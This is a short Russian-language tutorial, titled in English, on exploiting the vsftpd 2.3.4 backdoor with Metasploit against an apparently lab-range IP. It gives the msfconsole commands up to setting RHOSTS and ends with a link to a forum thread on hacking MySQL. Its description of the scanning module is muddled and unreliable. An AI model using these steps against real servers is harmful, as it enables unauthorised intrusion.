Hacking an FTP server using Kali Linux (vsftpd vulnerability)

FTP-это сервис, который обычно используется на веб-серверах веб-мастерами для удаленного доступа к файлам. Таким образом, практически невозможно не найти эту услугу в одной из систем наших клиентов во время взаимодействия.

Вспомогательный модуль "vsftpd" будет сканировать диапазон IP-адресов, пытающихся войти на FTP-серверы. Этот модуль будет проверять учетные записи FTP на ряде компьютеров и сообщать об успешных входах в систему. Если вы загрузили плагин базы данных и подключились к базе данных, этот модуль будет записывать успешные входы в систему и хосты, чтобы вы могли отслеживать свой доступ.



Давайте начнем взламывать FTP-сервер с помощью Kali Linux (уязвимость vsftpd)
Шаг 1 :- PostgreSQL доступен интегрированным с управлением пакетами на большинстве платформ Linux. Когда это доступно, это рекомендуемый способ установки PostgreSQL, поскольку он обеспечивает надлежащую интеграцию с операционной системой, включая автоматическое исправление и другие функции управления.

Шаг 2 :- Это msfconsole. Msfconsole-это основной интерфейс для MetaSploit. Существуют графические интерфейсы (armitage), а также веб-интерфейс (websploit). С помощью msfconsole вы можете запускать эксплойты, создавать прослушиватели, настраивать полезные нагрузки и т.д.

Шаг 3 :- Текущее состояние базы данных.

db_status

Code

db_status

search vsftpd

Code

search vsftpd

Шаг 4 :- Используйте бэкдор Vsftpd.

use exploit/unix/ftp/vsftpd_234_backdoor

Code

use exploit/unix/ftp/vsftpd_234_backdoor

Шаг 5 :- Установите целевой IP в RHOSTS.

set RHOSTS 192.168.69.131

Code

set RHOSTS 192.168.69.131

Статья о взломе баз данных MySQL с помощью Metasploit.
https://zelenka.guru/threads/2948735/​